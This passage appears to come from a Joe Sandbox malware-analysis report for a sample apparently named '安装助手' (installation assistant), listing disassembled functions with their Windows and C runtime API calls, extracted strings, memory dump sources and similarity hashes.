                                • Instruction Fuzzy Hash: 4341E334B102199FCF00DF78D980ADE7BB5AF4636CF188155E8249BB91D735DA89CB90
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: api-ms-$ext-ms-
                                • API String ID: 0-537541572
                                • Opcode ID: 4732ff26994b2fd012e1865508e2ca2ef5de17316711fdccbddfb8a131a20509
                                • Instruction ID: 6fb23d68b77751ccfe5187088280a17fd2db46ef7b36adca31a58805004b5d5b
                                • Opcode Fuzzy Hash: 4732ff26994b2fd012e1865508e2ca2ef5de17316711fdccbddfb8a131a20509
                                • Instruction Fuzzy Hash: D721EB32A1E321ABDB214B69CC40B0A3BB8EB46768F294655E955E7FC0D770DD81C5E0
                                APIs
                                • GetConsoleCP.KERNEL32(?,6CA1B0D0,?), ref: 6CA1BEF9
                                • __fassign.LIBCMT ref: 6CA1C0D8
                                • __fassign.LIBCMT ref: 6CA1C0F5
                                • WriteFile.KERNEL32(?,6CA25AB6,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA1C13D
                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6CA1C17D
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 6CA1C229
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: FileWrite__fassign$ConsoleErrorLast
                                • String ID:
                                • API String ID: 4031098158-0
                                • Opcode ID: d01833fcaf341943886666313c23435fd57e035e3f6b31aa1dad8c181c6dacf6
                                • Instruction ID: 5c1d36998edcf0efe099847a401bf2ab573ea5826371c31f86f2f089b2da20fd
                                • Opcode Fuzzy Hash: d01833fcaf341943886666313c23435fd57e035e3f6b31aa1dad8c181c6dacf6
                                • Instruction Fuzzy Hash: 12D1CC71E042589FCF15DFE8C9809EDBBB5BF09318F280169E855BBB01D731A98ACB50
                                APIs
                                • std::_Lockit::_Lockit.LIBCPMT ref: 6C8D2F95
                                • std::_Lockit::_Lockit.LIBCPMT ref: 6C8D2FAF
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6C8D2FD0
                                • __Getctype.LIBCPMT ref: 6C8D3084
                                • std::_Facet_Register.LIBCPMT ref: 6C8D309C
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6C8D30B7
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
                                • String ID:
                                • API String ID: 1102183713-0
                                • Opcode ID: 6d1eac8f769a59ec274a431ace9a3f84b4c2a6b0040af483ff41a1f75491cadf
                                • Instruction ID: ba2f6b0b3660b499045baf6668c28dc96cec6f4e5623e6788b70a47febea4444
                                • Opcode Fuzzy Hash: 6d1eac8f769a59ec274a431ace9a3f84b4c2a6b0040af483ff41a1f75491cadf
                                • Instruction Fuzzy Hash: 5E417971E002148FCB24CF88DA54B9EB7B0FF65758F064528D819AB750D775AD88CF91
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __aulldiv$__aullrem
                                • String ID:
                                • API String ID: 2022606265-0
                                • Opcode ID: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                • Instruction ID: 80a583a3cb7fe14dd55e751e4780dc1e97c21824858298073db8b8103e8e3a5b
                                • Opcode Fuzzy Hash: 1f394eef11d621d2b0abd6c005444ee54f283a007719147bbe3c0d60170dbe25
                                • Instruction Fuzzy Hash: C421D038901219FFDF208F958D40DCF7A79EF817AAF64C226B521A16D4D2718DE4C7A1
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CA4A6F1
                                  • Part of subcall function 6CA59173: __EH_prolog.LIBCMT ref: 6CA59178
                                • __EH_prolog.LIBCMT ref: 6CA4A8F9
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: IJ$WIJ$J
                                • API String ID: 3519838083-740443243
                                APIs
                                • _free.LIBCMT ref: 6CA25ADD
                                • _free.LIBCMT ref: 6CA25B06
                                • SetEndOfFile.KERNEL32(00000000,6CA246EC,00000000,6CA1B0D0,?,?,?,?,?,?,?,6CA246EC,6CA1B0D0,00000000), ref: 6CA25B38
                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,6CA246EC,6CA1B0D0,00000000,?,?,?,?,00000000,?), ref: 6CA25B54
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: _free$ErrorFileLast
                                • String ID: 8Q
                                • API String ID: 1547350101-4022487301
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CA5E41D
                                  • Part of subcall function 6CA5EE40: __EH_prolog.LIBCMT ref: 6CA5EE45
                                  • Part of subcall function 6CA5E8EB: __EH_prolog.LIBCMT ref: 6CA5E8F0
                                  • Part of subcall function 6CA5E593: __EH_prolog.LIBCMT ref: 6CA5E598
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: &qB$0aJ$A0$XqB
                                • API String ID: 3519838083-1326096578
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: J$0J$DJ$`J
                                • API String ID: 3519838083-2453737217
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,6CA0F1B4,?,?,6CA0F235,?,?,?), ref: 6CA0F13F
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6CA0F152
                                • FreeLibrary.KERNEL32(00000000,?,?,6CA0F1B4,?,?,6CA0F235,?,?,?), ref: 6CA0F175
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                APIs
                                • __EH_prolog3.LIBCMT ref: 6CA0732E
                                • std::_Lockit::_Lockit.LIBCPMT ref: 6CA07339
                                • std::_Lockit::~_Lockit.LIBCPMT ref: 6CA073A7
                                  • Part of subcall function 6CA07230: std::locale::_Locimp::_Locimp.LIBCPMT ref: 6CA07248
                                • std::locale::_Setgloballocale.LIBCPMT ref: 6CA07354
                                • _Yarn.LIBCPMT ref: 6CA0736A
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                • String ID:
                                • API String ID: 1088826258-0
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: $!$@
                                • API String ID: 3519838083-2517134481
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog__aulldiv
                                • String ID: $SJ
                                • API String ID: 4125985754-3948962906
                                APIs
                                  • Part of subcall function 6CA07327: __EH_prolog3.LIBCMT ref: 6CA0732E
                                  • Part of subcall function 6CA07327: std::_Lockit::_Lockit.LIBCPMT ref: 6CA07339
                                  • Part of subcall function 6CA07327: std::locale::_Setgloballocale.LIBCPMT ref: 6CA07354
                                  • Part of subcall function 6CA07327: _Yarn.LIBCPMT ref: 6CA0736A
                                  • Part of subcall function 6CA07327: std::_Lockit::~_Lockit.LIBCPMT ref: 6CA073A7
                                  • Part of subcall function 6C8D2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C8D2F95
                                  • Part of subcall function 6C8D2F60: std::_Lockit::_Lockit.LIBCPMT ref: 6C8D2FAF
                                  • Part of subcall function 6C8D2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C8D2FD0
                                  • Part of subcall function 6C8D2F60: __Getctype.LIBCPMT ref: 6C8D3084
                                  • Part of subcall function 6C8D2F60: std::_Facet_Register.LIBCPMT ref: 6C8D309C
                                  • Part of subcall function 6C8D2F60: std::_Lockit::~_Lockit.LIBCPMT ref: 6C8D30B7
                                • std::ios_base::_Addstd.LIBCPMT ref: 6C8D211B
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$AddstdFacet_GetctypeH_prolog3RegisterSetgloballocaleYarnstd::ios_base::_std::locale::_
                                • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                • API String ID: 3332196525-1866435925
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: $CK$CK
                                • API String ID: 3519838083-2957773085
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: 0$LrJ$x
                                • API String ID: 3519838083-658305261
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CA64ECC
                                  • Part of subcall function 6CA4F58A: __EH_prolog.LIBCMT ref: 6CA4F58F
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: :hJ$dJ$xJ
                                • API String ID: 3519838083-2437443688
                                APIs
                                • SetFilePointerEx.KERNEL32(00000000,?,00000000,6CA1B0D0,6C8D1DEA,00008000,6CA1B0D0,?,?,?,6CA1AC7F,6CA1B0D0,?,00000000,6C8D1DEA), ref: 6CA1ADC9
                                • GetLastError.KERNEL32(?,?,?,6CA1AC7F,6CA1B0D0,?,00000000,6C8D1DEA,?,6CA2469E,6CA1B0D0,000000FF,000000FF,00000002,00008000,6CA1B0D0), ref: 6CA1ADD3
                                • __dosmaperr.LIBCMT ref: 6CA1ADDA
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ErrorFileLastPointer__dosmaperr
                                • String ID: 8Q
                                • API String ID: 2336955059-4022487301
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID:
                                • String ID: <J$DJ$HJ$TJ$]
                                • API String ID: 0-686860805
                                APIs
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: __aulldiv
                                • String ID:
                                • API String ID: 3732870572-0
                                APIs
                                • GetLastError.KERNEL32(?,?,?,6CA0EF64,6CA36DD8,0000000C), ref: 6CA149B7
                                • _free.LIBCMT ref: 6CA14A14
                                • _free.LIBCMT ref: 6CA14A4A
                                • SetLastError.KERNEL32(00000000,00000008,000000FF,?,?,6CA0EF64,6CA36DD8,0000000C), ref: 6CA14A55
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ErrorLast_free
                                • String ID:
                                • API String ID: 2283115069-0
                                APIs
                                • WriteConsoleW.KERNEL32(00000000,?,6CA246EC,00000000,00000000,?,6CA24B51,00000000,00000001,00000000,6CA1B0D0,?,6CA1C286,?,?,6CA1B0D0), ref: 6CA25ED1
                                • GetLastError.KERNEL32(?,6CA24B51,00000000,00000001,00000000,6CA1B0D0,?,6CA1C286,?,?,6CA1B0D0,?,6CA1B0D0,?,6CA1BD1C,6CA25AB6), ref: 6CA25EDD
                                  • Part of subcall function 6CA25F2E: CloseHandle.KERNEL32(FFFFFFFE,6CA25EED,?,6CA24B51,00000000,00000001,00000000,6CA1B0D0,?,6CA1C286,?,?,6CA1B0D0,?,6CA1B0D0), ref: 6CA25F3E
                                • ___initconout.LIBCMT ref: 6CA25EED
                                  • Part of subcall function 6CA25F0F: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6CA25EAB,6CA24B3E,6CA1B0D0,?,6CA1C286,?,?,6CA1B0D0,?), ref: 6CA25F22
                                • WriteConsoleW.KERNEL32(00000000,?,6CA246EC,00000000,?,6CA24B51,00000000,00000001,00000000,6CA1B0D0,?,6CA1C286,?,?,6CA1B0D0,?), ref: 6CA25F02
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                • String ID:
                                • API String ID: 2744216297-0
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CA3E077
                                  • Part of subcall function 6CA3DFF5: __EH_prolog.LIBCMT ref: 6CA3DFFA
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: :$\
                                • API String ID: 3519838083-1166558509
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog__aullrem
                                • String ID: d%K
                                • API String ID: 3415659256-3110269457
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953185042.000000006CA28000.00000002.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1954651204.000000006CBF2000.00000002.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog3_
                                • String ID: 8Q
                                • API String ID: 2427045233-4022487301
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: @$hfJ
                                • API String ID: 3519838083-1391159562
                                APIs
                                • __EH_prolog.LIBCMT ref: 6CA58C5D
                                  • Part of subcall function 6CA5761A: __EH_prolog.LIBCMT ref: 6CA5761F
                                  • Part of subcall function 6CA57A2E: __EH_prolog.LIBCMT ref: 6CA57A33
                                  • Part of subcall function 6CA58EA5: __EH_prolog.LIBCMT ref: 6CA58EAA
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1953272724.000000006CA38000.00000008.00000001.01000000.00000009.sdmp, Offset: 6CA38000, based on PE: true
                                 • Associated: 00000005.00000002.1953912671.000000006CB03000.00000004.00000001.01000000.00000009.sdmp
                                 • Associated: 00000005.00000002.1953948209.000000006CB09000.00000020.00000001.01000000.00000009.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_5_2_6c880000_#U5b89#U88c5#U52a9#U624b_1.jbxd
                                Similarity
                                • API ID: H_prolog
                                • String ID: WZJ
                                • API String ID: 3519838083-1089469559
                                APIs
                                • ___std_exception_destroy.LIBVCRUNTIME ref: 6C8D2A76
                                Strings
                                Memory Dump Source
                                • Source File: 00000005.00000002.1951906394.000000006C881000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C880000, based on PE: true
                                 • Associated: 00000005.00000002.1951876229.000000006C880000.00000002.00000001.01000000.00000009.sdmp
